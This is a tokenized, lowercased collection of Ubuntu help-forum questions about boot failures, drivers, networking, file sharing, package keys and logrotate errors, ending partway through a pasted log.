498443	ubuntu 12.04 - repeated booting problems	i have been having problems with my ubuntu 12.04 lts installation ( dual boot with windows 7 ) . whenever i install some update or if the machine is stuck & i try to do a hard reboot , the os never boots back and either shows the message : could not write bytes : broken pipe or shows a black screen with a cursor on top left : _ i do n't think i have done really wrong with my ubuntu ( a hard reboot should n't break a os .. everyone does that ) ; just now it happened after i just installed a new copy and rebooted after some steps ( see edit ) . i want to ask what are the causes of these errors as i want to find a permanent fix to this problem . can someone suggest how i could diagnose the problem with my machine ? edit one thing i would like to add to my question , since i am getting some responses and i need to give accurate description . i forgot to mention , that i tried to compile android on my machine . that requires the following step ( i did n't know it would effect the machine because of my lack of experience - but now i think i need to mention it ) : sudo apt-get install git-core gnupg flex bison gperf build-essential \ zip curl zlib1g-dev libc6-dev lib32ncurses5-dev ia32-libs \ x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev \ libgl1-mesa-dev g++-multilib mingw32 tofrodos python-markdown \ libxml2-utils xsltproc see here . when i try to this , it removes a lot of packages related to xserver/xorg , because one these has a dependency ; when i try to apt-get that dependency , it removes many packages . could this be causing the problem ? could someone please try running this ? ( i do n't have experience with these packages )
498449	how to know if a authenticate box is real or fake ?	for example , someone creates a fake authenticate dialog to get my root password . how to know if it is real or fake ?
498453	configure wireless hotspot ubuntu 14.04 trusty	i would like to turn my laptop ( ubuntu 14.04 - trusty ) into a wireless hotspot . so i linked my laptop to my router with an ethernet cable , i went into system settings > network > wireless . i selected my router and cliked on `` use as a hotspot '' . the hotspot was created indeed . now i want to change the network name and the security key but i cant find a way to do that . it seems that those inforations are like hardened and no settings button is offered . how can i do that , using the gui or command line , anything that works ? edit 1 when my wireless hotspot is created , there is not settings access to it . the ssid is my computer domain ( me @ my_domain ) . the screen looks like : network name my_domain security type wep security key xxxxxxx no configuation button is provided .
498457	ubuntu 14.04 boot from san	i installed ubuntu 14.04 on iscsi target and after reboot i get grub rescue prombt after error boot sector id not valid error : no such device : c098787-4839-34bh-3d4f-b3eef9i3j9f any advice ?
498458	radeon 5450 and 14.04 lts once more	the motherboard is a micro atx supermicro with on-board vga , which works . the radeon card is not visible in the display settings ; it shows only one display . the card is discovered : [ 0.353979 ] vgaarb : device added : pci:0000:01:00.0 , decodes=io+mem , owns=none , locks=none [ 0.353992 ] vgaarb : device added : pci:0000:05:00.0 , decodes=io+mem , owns=io+mem , locks=none [ 0.353993 ] vgaarb : loaded [ 0.353994 ] vgaarb : bridge control possible 0000:05:00.0 [ 0.353995 ] vgaarb : bridge control possible 0000:01:00.0 however , `` owns=none '' looks suspicious . does that mean that neither i/o ports nor memory space is allocated to the card ? ( in that case it clearly is unusable . ) going back in the system log i find : [ 0.215721 ] pci 0000:01:00.0 : [ 1002:68f9 ] type 00 class 0x030000 [ 0.215738 ] pci 0000:01:00.0 : reg 0x10 : [ mem 0xe0000000-0xefffffff 64bit pref ] [ 0.215750 ] pci 0000:01:00.0 : reg 0x18 : [ mem 0xf7320000-0xf733ffff 64bit ] [ 0.215757 ] pci 0000:01:00.0 : reg 0x20 : [ io 0xe000-0xe0ff ] [ 0.215771 ] pci 0000:01:00.0 : reg 0x30 : [ mem 0xf7300000-0xf731ffff pref ] [ 0.215808 ] pci 0000:01:00.0 : supports d1 d2 [ 0.215824 ] pci 0000:01:00.0 : system wakeup disabled by acpi [ 0.215851 ] pci 0000:01:00.1 : [ 1002 : aa68 ] type 00 class 0x040300 [ 0.215869 ] pci 0000:01:00.1 : reg 0x10 : [ mem 0xf7340000-0xf7343fff 64bit ] [ 0.215946 ] pci 0000:01:00.1 : supports d1 d2 ... [ 0.216869 ] pci 0000:05:00.0 : [ 1a03:2000 ] type 00 class 0x030000 [ 0.216899 ] pci 0000:05:00.0 : reg 0x10 : [ mem 0xf6000000-0xf6ffffff ] [ 0.216913 ] pci 0000:05:00.0 : reg 0x14 : [ mem 0xf7000000-0xf701ffff ] [ 0.216928 ] pci 0000:05:00.0 : reg 0x18 : [ io 0xc000-0xc07f ] [ 0.217034 ] pci 0000:05:00.0 : supports d1 d2 [ 0.217035 ] pci 0000:05:00.0 : pme # supported from d0 d1 d2 d3hot d3cold i tried `` additional drivers '' , but that made things worse ( the desktop did not come up properly ) and followed the instructions in x troubleshooting , but that did not remove the proprietary driver . i do have ssh access with a working x tunnel . what is the executable behind the additional drivers in the settings applet ? or the settings applet itself ?
498459	`` /bin/rm : can not remove files .. no such file or directory `` though they exist	i am trying to fix ffmpeg library conflicts between manually installed and john sverissons 's ppa . in this context i attemped to remove libavcodec.so libavutil.so , libswscale.so , libswresample.so , libavresample.so , libavfilter.so in my system by doing locate -0b libavfilter.so | xargs -0 rm for each *.so files above . i could remove all above files except libavfilter.so when i issue locate -b libavfilter.so it lists paths but when i attempt to remove it i get /bin/rm : can not remove '/usr/lib/i386-linux-gnu/libavfilter.so ' : no such file or directory what happens here ?
498460	graphic sound equalizer for ubuntu	is there a graphic sound equalizer for ubuntu ? i want one for pulseaudio 's global system settings .
498462	apt-get stuck at 0 % [ working ]	when i try to do anything with apt-get using a terminal , the apt-get gets stuck at 0 % [ working ] .
498468	public key problem when updating	when i try to start the update manager , and install updates , i get this error : requires installation of untrusted packages . this action would require the installation of packages from unauthenticated sources . it then gives a load of libraries ( i think ? ) that can not be updated . they all seem to be linked to the gis software qgis . if i try to do : sudo apt-get update . then it scrolls through a load of messages , ending with this : w : gpg error : http : //qgis.org precise release : the following signatures could n't be verified because the public key is not available : no_pubkey bba6491f47765b75 so i did some searching and tried this : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys bbba6491f47765b75 however i then get the error : gph : requesting key 47765b75 from hkp server keyserver.ubuntu.com ? : keyserver.ubuntu.com : connection refused gpgkeys : http fetch error 7 : cojudl n't connect : connection refused gpg : no valid openpgp data found gpg : total numner processed : 0 i 'd appreciate ideas on what to do about this please . best wishes james
498477	no partitions show up when trying to install ubuntu 14.04	i 'm very new to ubuntu , and have been using windows all my life . i want to install ubuntu and run as my default operating system . i do n't need dual boot . my computer has a 32gb ssd and 500gb hdd . when running the ubuntu installation package , i get to the page where you choose which partition to install ubuntu on , and nothing shows up in the list , and it wo n't allow me to continue . when i check in gparted , all the partitions show up , so i do n't understand what i need to do to get the installer to recognise my hard drive/ partitions . can anybody help me ? ! ? !
498478	is there any solution to set baud rate , line discipline etc. , by only using our kernel module ?	i wrote a kernel module for a touch screen monitor and earlier i used inputattach ( written in userspace ) to open serial port , set baud rate , control flags , line discipline etc . but now i want to implement the functionalities of inputattach directly in our driver as we do n't want to trigger our driver from an userspace program i.e inputattch . but i cant able to set c_ispeed , c_ospeed , c_cflag , c_iflag , line discipline , etc. , in kernel space . is there any solution to set baud rate , line discipline etc. , by only using our kernel module ?
498479	ubuntu 12.04 - incorrect graphics information	i am checking my system settings , but see graphics as unknown . i have nvidia graphics card . i tried this answer , and ran : sudo apt-get install mesa-utils now if i check it , instead of showing my nvidia information , it shows : how can i make sure my nvidia card is configured properly and shown in system settings ? edit current nvidia installations : $ sudo dpkg -- get-selections | grep nvidia nvidia-304-updates install nvidia-current-updates install nvidia-settings install
498481	samba in ubuntu 14.04	i have a small home network consisting of ubuntu 12 and 14 and win xp . i was using samba well for local file and print share . until i upgraded to 14.04 . now nothing works . i have read all these forums and everything i can find on the internet and either none of it quite works as described or it requires a lot of terminal type knowledge - which i donât have . is there a simple way to get shares working again like they did in 12.04 . preferably via a gui rather than too much deep terminal typing . if even i could get the 14.04 machines to access files and printers on the 12.04 box that would be useful as a start . they can see it but fail to retrieve the share list . or after an automatic prompted samba install the 'files ' window crashes on opening workgroup . there must be a simple way to achieve this ? no ?
498482	hardware enablement stack install is giving dependency issues	i 'm trying to install the hardware enablement stack onto 12.04 but i 'm running into the following dependency issue : the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but 10.1.3-0ubuntu0.1~precise1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but 2:1.15.1-0ubuntu2~precise1 is to be installed how can i circumvent this and get the hwe to install ?
498483	internet not working	i have dualboot windows7/ubuntu 12.10 . in windows the internet is working , in ubuntu it is not . it is showing network diconnected although it is locally connected via lan cable to the router . the result from ip addr : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host wlan0 : link/ether c0:14:3d : d0:1b:49 brd ff : ff : ff : ff : ff : ff
498485	ubuntu 14.04 desktop under windows 8.1 hyper-v	is it possibly to speed up the graphics of ubuntu 14.04 desktop under windows 8.1 hyper-v anyhow ? i 've already decreased the screen resolution and disabled the compiz video effects , but it 's still very laggy . it used to work with almost native performance under vmware player , but i have to move on with hyper-v. update can you post the output of /usr/lib/nux/unity_support_test -p sure : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits ) opengl version string : 2.1 mesa 10.1.3 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no also : avo @ ubuntu-desktop-vm : ~ $ lsmod | grep hv hv_netvsc 31255 0 hv_storvsc 17785 2 hv_utils 19003 0 hv_vmbus 50383 6 hyperv_keyboard , hv_netvsc , hid_hyperv , hv_utils , hyperv_fb , hv_storvsc
498487	ubuntu wi-fi hotspot with web authentication	i 'm searching for a solution to use in my company for guests or visitors , an wi-fi hotspot system like hotels have . i 'll share wi-fi connection with username and password . when users connect to wi-fi system will re-direct to them web based login page to connect web sites . i searched on google and here but honestly after so many articles as a rookie about linux i 'm having an brain explode : ) most of peoples recommended an live cd name is zonecd but i could n't find on internet ( the page they provided is about roof fixing -- http : //www.publicip.net/features.php -- the article is here http : //www.linuxplanet.com/linuxplanet/reports/7087/2 ) . also i 've found some other articles which says you can do with open radius , open hotspot add-ons but honestly i could n't installed on my ubuntu . i get really confused and decided to ask here , i think it 's possible to do this on ubuntu bot how we can do it ? is anybody did this before and can you share about information or an article about how we can do it ?
498490	reinstall ubuntu 12.04 without losing data	i had tried getting propriety drivers for ati radeon hd 8670m card on dell inspiron 15 with pre-installed ubuntu 12.04 lts . however fglrx seems to have messed up the xorg files and i ca n't go beyond the black screen at the time of booting . i have tried altering grub to nomodeset , but it has n't helped . i think i will re-install ubuntu . however i do n't want to lose data . i have found certain tutorials and but am not able to ascertain which one would be applicable to my current hard drive partition settings . here is a picture of my hard drive partition . it will be grateful if someone can help me with the right set of instructions for doing this .
498492	mounting a webdav share for all users	i 'm trying to mount a webdav share with this fstab line : myserverip /media/myserver/ davfs noauto , user , rw 0 0 i have added the secret credentials to ~/.davfs2/secrets . also done sudo dpkg-reconfigure davfs2 to allow mounting by non-root users . this all works fine if i have the following in /etc/davfs2/davfs2.conf : dav_user myusername # system wide config file only dav_group myusername # system wide config file only but this obviously only works for one user , however if i leave it at the default : dav_user davfs2 # system wide config file only dav_group davfs2 # system wide config file only and add my user account to the group davfs2 via sudo usermod -ag davfs2 myusername which is successful as shown by the output of groups myusername : myusername : myusername davfs2 however when i now try to mount the share i get the following error : /sbin/mount.davfs : user myusername must be a member of group davfs2 so how do i get it to mount by group and why does it not recognize that iâm in the correct group .
498494	how could i recover my files after ubuntu installation ?	i was using windows 8.1 and wanted to try ubuntu 14.04 . my hard disk has 250gb . there were 2 partitions , c : and d : i 've shrinked c : by 20gb and created a new partition and installed ubuntu in the new partition , but it was not working . the screen was freezing . i thought i did n't install it correctly , so i tried to reinstall it . i really do n't know what i did , but now the disk has only a 232gb partition . my windows partitions are lost . is there a way to recover my files , especially from d : ? lsbk output : name maj : min rm size ro type mountpoint sda 8:0 0 232,9g 0 disk ├─sda1 8:1 0 231,1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 1,8g 0 part [ swap ] sr0 11:0 1 1024m 0 rom
498499	how to set icons of my favorite apps to the desktop ?	my favorite app icons should be displayed on my desktop . how can i do this ? thanks .
498503	unity - gaussian blur to the launcher bar ?	if the top panel can be blurry , can the launcher bar be blurry like the panel or the dash ?
498504	executing text file as python command	i gave a file named `` drop '' . chmod +x drop for execution property , this is what the file contains : ! # usr/bin/env python desktop/.drop.py start it is a script downloaded from dropbox official website to manage dropbox , with this script i want to start dropbox but it seems it 's not getting executed . basically i want to transform this into a double click script : python desktop/.drop.py start
498505	how do i install light table ?	i am very new to ubuntu and i plan on learning python for which i need to install light table . i could n't find any specific instructions anywhere on the net . please provide me the steps in detail . also i could n't find any opt folder in my home directory and most of the websites tell me that 's the place i have to copy the extracted light table folder .
498506	using the option -- help	i 've been tinkering around the terminal on ubuntu and noticed that by using aspell -- help i got the very detailed documentation about the command aspell . whereas when i use look -- help all i get is look : invalid option -- '-' usage : look [ -bdf ] [ -t char ] string [ file ... ] i wish to be able to retrieve explicit documentation about every command in order to familiarize myself with options usage and meaning . ( without having to search for it online )
498508	wubi instal problem - windows 7	i have tried to use the wubi install for 14.04 . all appears to go well until towards the end the install starts to completely remove items . these items are things such as firefox and rhythmbox etc . when the install has finished and the system reboots for finalisation the ubuntu os load states there is a serious error on the disk and it can not mount the volume . the ubuntu directory that is left on the disk after the install looks pretty empty though does include directories such disks . any ideas are welcome . ps . i have uninstalled ubuntu using windows without problem .
498509	wireless not being detected at all 12.04 inspiron 15r	i have a dell inspiron 15r that came preinstalled with windows 8.1 i just installed ubuntu 12.04 in dual boot and got it working . now i can not connect to wifi . i tried how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ? and also other methods involving installing firmware-b43-installer and b43-fwcutter . nothing works . rfkill list all only shows bluetooth : rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no vipluv @ krishnakshetra : ~ $ my wireless hardware is n't detected at all ! what do i do ?
498513	default mysql password for amazon ubuntu apache php mysql - 25 - 05 - 2013 ( ami-3b117a52 )	hi i just launched a new instance of ubuntu apache php mysql - 25 - 05 - 2013 ( ami-3b117a52 ) any idea what could be the default username/password of pre installed mysql ? i can log into it by typing just mysql on the console but i need the credentials so i can use them in my app thanks
498514	can not dual boot ubuntu 14.04 lts along with windows 8.1	got a brand new lenovo g 510 laptop with the following specs : - aled i5-4200m , 8 gb ram ,1 tb hdd , 2 gb amd-radeon graphics card with windows 8.1 . i installed ubuntu 14.04 , alloting around 150 gb , inclusive of 8 gb for swap and 10 gb for bios space ( where bootloader location was set ) , but i am not able to dual boot alongside windows 8.1 . i installed ubuntu in legacy mode coz i could n't boot from usb in uefi mode . ubuntu is installed , but it would n't load . it goes directly to windows 8.1 . i also updated grub , but would n't work . please help me to sort this out . thanks in advance .
498516	acroread ca n't edit annotations : commenting not allowed	so i started annotating a pdf on a windows machine but then i wanted to make some changes on my linux machine later . i have the native linux acroread 9 installed which can do comments but there 's a 50 % chance a given document is locked or in some way broken and in file- > properties- > security , commenting : not allowed ( for that matter this might happen with the latest versions too , not sure ) . i also run into huge performance issues when viewing comments ( extreme , and i mean extreme , lag on a decent pc ) . so i thought i 'd try a newer version of adobe reader under wine . this did not work out at all ( as of july 2014 ) with the installer failing to create any files or crashing at launch when copying from a windows install . how can i reliably add/edit annotations to pdfs on linux , yet allow all those non-techie people who use the windows and adobe reader to see and interact with them ?
498521	packet loss in ping	i 'm new to linux . currently i have two ubuntu vms on a windows 8 host . i created two virtual networks for both vms as below : 1-nat : to use the windows 8 internet two internal connections to connect to each other for running hadoop . everything is normal , they can ping each other and i can browse websites . but when i ping a website i browsed all of them have more than 70 % packet loss . so i looked at /etc/interfaces and i only see these two lines : auto lo iface lo inet loopback when i execute ifconfig i have eth0 , eht1 and lo . do i have to change the interfaces ? how can i prevent the package loss ? i am running apache nutch and i have an error on it , i know it is because of this that it can not connect to the internet to crawl a website .
498524	how to interpret boot-repair pastebin results	i am dual booting windows 8.1 and ubuntu . after some ( probably ill-informed ) mucking around with easeus partition manager in windows 8 , my windows boot manager wo n't boot windows . here is the pastebin that boot-repair gave me after it was unsuccessful , but i do n't know what to do with this information : http : //paste.ubuntu.com/7801618/ . does anyone smarter than me know what i should do from here ?
498526	mounting a webdav share by users	how do i make a webdav share mountable , so that is available for all users ? without having to type in a password .
498528	nfs client unable to mount shared directory	i have a server ( 10.0.0.1 ) and a client ( 10.0.0.2 ) systems , they both run ubuntu 12.04 , they are connected via ethernet . they can ping each other . they can ssh into one another . if i on the server i do : sudo showmount -e 10.0.0.1 all the folders which i want to share are there . from the server i ssh into the client and do : sudo showmount -e 10.0.0.1 it times out , or takes so long i ctrl+z out . i have been trying random suggestions from the internet all morning , any help ? updates ! ! ! ! ! ! sudo netstat -nlp | grep :111 tcp 0 0 0.0.0.0:111 0.0.0.0 : * listen 788/rpcbind tcp6 0 0 : ::111 : : : * listen 788/rpcbind udp 0 0 0.0.0.0:111 0.0.0.0 : * 788/rpcbind udp6 0 0 : ::111 : : : * 788/rpcbind sudo ufw status numbered status : active to action from -- -- -- -- -- -- [ 1 ] 22 allow in anywhere [ 2 ] 22 ( v6 ) allow in anywhere ( v6 ) update 2 ! ! ! ! ! ! ! - showmount now works , but unable to mount . client @ client : ~ $ sudo showmount -e 10.0.0.1 export list for 10.0.0.1 : /export/1tbhdd 10.0.0.0/24 /export/users 10.0.0.0/24 /export 10.0.0.0/24 cliearn @ client : ~ $ sudo mount 10.0.0.1 : /export/1tbhdd /export/1tbhdd mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified client @ client : ~ $ rpcinfo -p program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 44469 status 100024 1 tcp 54570 status
498529	log rotate returns 1 weekly - how do i debug this ?	i 'm trying to understand why logrotate returns 1 each week : run-parts : /etc/cron.daily/logrotate exited with return code 1 initially the log did n't give me any output at all . i 've since switched on more verbose logging from logrotate . with the -v flag : /usr/sbin/logrotate -v /etc/logrotate.conf i do n't see anything in the log to record anything failing . so my question . if there 's nothing in this log then where else can i look for what 's causing this failure ? /etc/cron.daily/logrotate : reading config file /etc/logrotate.conf olddir is now /var/log/archive compress_prog is now /bin/bzip2 compress_options is now -9 compress_ext is now .bz2 including /etc/logrotate.d reading config file apache2 reading config info for /var/log/apache2/*.log reading config file apt reading config info for /var/log/apt/term.log reading config info for /var/log/apt/history.log reading config file dpkg reading config info for /var/log/dpkg.log reading config info for /var/log/alternatives.log reading config file ident reading config info for /var/log/ident.log reading config file mysql-server reading config info for /var/log/mysql.log reading config file postgresql-common reading config info for /var/log/postgresql/*.log reading config file redis-server reading config info for /var/log/redis/*.log reading config file rsyslog reading config info for /var/log/syslog /var/log/mail.info /var/log/mail.warn /var/log/mail.err /var/log/mail.log /var/log/daemon.log /var/log/kern.log /var/log/auth.log /var/log/user.log /var/log/lpr.log /var/log/debug /var/log/messages reading config file teamspeak3 reading config info for /var/log/teamspeak3/ts3server_*.log reading config file upstart reading config info for /var/log/upstart/*.log reading config info for /var/log/wtmp reading config info for /var/log/btmp handling 14 logs rotating pattern : /var/log/apache2/*.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/apache2/access.log log does not need rotating considering log /var/log/apache2/error.log log needs rotating considering log /var/log/apache2/example2.com-access.log log needs rotating considering log /var/log/apache2/example2.com-error.log log needs rotating considering log /var/log/apache2/other_vhosts_access.log log does not need rotating considering log /var/log/apache2/svn.example1.com-access.log log does not need rotating considering log /var/log/apache2/svn.example1.com-error.log log needs rotating considering log /var/log/apache2/www.example1.com-access.log log needs rotating considering log /var/log/apache2/www.example1.com-error.log log needs rotating rotating log /var/log/apache2/error.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/apache2/example2.com-access.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/apache2/example2.com-error.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/apache2/svn.example1.com-error.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/apache2/www.example1.com-access.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/apache2/www.example1.com-error.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 running prerotate script renaming /var/log/apache2/error.log to /var/log/archive/error.log-20140713 creating new /var/log/apache2/error.log mode = 0640 uid = 0 gid = 4 renaming /var/log/apache2/example2.com-access.log to /var/log/archive/example2.com-access.log-20140713 creating new /var/log/apache2/example2.com-access.log mode = 0640 uid = 0 gid = 4 renaming /var/log/apache2/example2.com-error.log to /var/log/archive/example2.com-error.log-20140713 creating new /var/log/apache2/example2.com-error.log mode = 0640 uid = 0 gid = 4 renaming /var/log/apache2/svn.example1.com-error.log to /var/log/archive/svn.example1.com-error.log-20140713 creating new /var/log/apache2/svn.example1.com-error.log mode = 0640 uid = 0 gid = 4 renaming /var/log/apache2/www.example1.com-access.log to /var/log/archive/www.example1.com-access.log-20140713 creating new /var/log/apache2/www.example1.com-access.log mode = 0640 uid = 0 gid = 4 renaming /var/log/apache2/www.example1.com-error.log to /var/log/archive/www.example1.com-error.log-20140713 creating new /var/log/apache2/www.example1.com-error.log mode = 0640 uid = 0 gid = 4 running postrotate script removing old log /var/log/archive/error.log-20130714.bz2 removing old log /var/log/archive/svn.example1.com-error.log-20130714.bz2 removing old log /var/log/archive/www.example1.com-access.log-20130714.bz2 removing old log /var/log/archive/www.example1.com-error.log-20130714.bz2 rotating pattern : /var/log/apt/term.log monthly ( 12 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/apt/term.log log does not need rotating rotating pattern : /var/log/apt/history.log monthly ( 12 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/apt/history.log log does not need rotating rotating pattern : /var/log/dpkg.log monthly ( 12 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/dpkg.log log does not need rotating rotating pattern : /var/log/alternatives.log monthly ( 12 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/alternatives.log log does not need rotating rotating pattern : /var/log/ident.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/ident.log log needs rotating rotating log /var/log/ident.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' glob finding logs to compress failed renaming /var/log/ident.log to /var/log/archive/ident.log-20140713 creating new /var/log/ident.log mode = 0640 uid = 0 gid = 0 running postrotate script removing old log /var/log/archive/ident.log-20130714.bz2 rotating pattern : /var/log/mysql.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/mysql.log log needs rotating rotating log /var/log/mysql.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' renaming /var/log/mysql.log to /var/log/archive/mysql.log-20140713 creating new /var/log/mysql.log mode = 0640 uid = 106 gid = 4 running postrotate script compressing log with : /bin/bzip2 removing old log /var/log/archive/mysql.log-20130714.bz2 rotating pattern : /var/log/postgresql/*.log weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/postgresql/postgresql-9.1-main.log log does not need rotating rotating pattern : /var/log/redis/*.log weekly ( 12 rotations ) olddir is /var/log/archive , empty log files are not rotated , old logs are removed considering log /var/log/redis/redis-server.log log does not need rotating rotating pattern : /var/log/syslog /var/log/mail.info /var/log/mail.warn /var/log/mail.err /var/log/mail.log /var/log/daemon.log /var/log/kern.log /var/log/auth.log /var/log/user.log /var/log/lpr.log /var/log/debug /var/log/messages weekly ( 52 rotations ) olddir is /var/log/archive , empty log files are rotated , old logs are removed considering log /var/log/syslog log needs rotating considering log /var/log/mail.info log needs rotating considering log /var/log/mail.warn log needs rotating considering log /var/log/mail.err log needs rotating considering log /var/log/mail.log log needs rotating considering log /var/log/daemon.log log needs rotating considering log /var/log/kern.log log needs rotating considering log /var/log/auth.log log needs rotating considering log /var/log/user.log log needs rotating considering log /var/log/lpr.log log needs rotating considering log /var/log/debug log needs rotating considering log /var/log/messages log needs rotating rotating log /var/log/syslog , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/mail.info , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/mail.warn , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/mail.err , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/mail.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/daemon.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/kern.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/auth.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/user.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/lpr.log , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/debug , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 rotating log /var/log/messages , log- > rotatecount is 52 dateext suffix '-20140713' glob pattern '- [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] [ 0-9 ] ' compressing log with : /bin/bzip2 renaming /var/log/syslog to /var/log/archive/syslog-20140713 creating new /var/log/syslog mode = 0640 uid = 105 gid = 4 renaming /var/log/mail.info to /var/log/archive/mail.info-20140713 creating new /var/log/mail.info mode = 0640 uid = 105 gid = 4 renaming /var/log/mail.warn to /var/log/archive/mail.warn-20140713 creating new /var/log/mail.warn mode = 0640 uid = 105 gid = 4 renaming /var/log/mail.err to /var/log/archive/mail.err-20140713 creating new /var/log/mail.err mode = 0640 uid = 105 gid = 4 renaming /var/log/mail.log to /var/log/archive/mail.log-20140713 creating new /var/log/mail.log mode = 0640 uid = 105 gid = 4 renaming /var/log/daemon.log 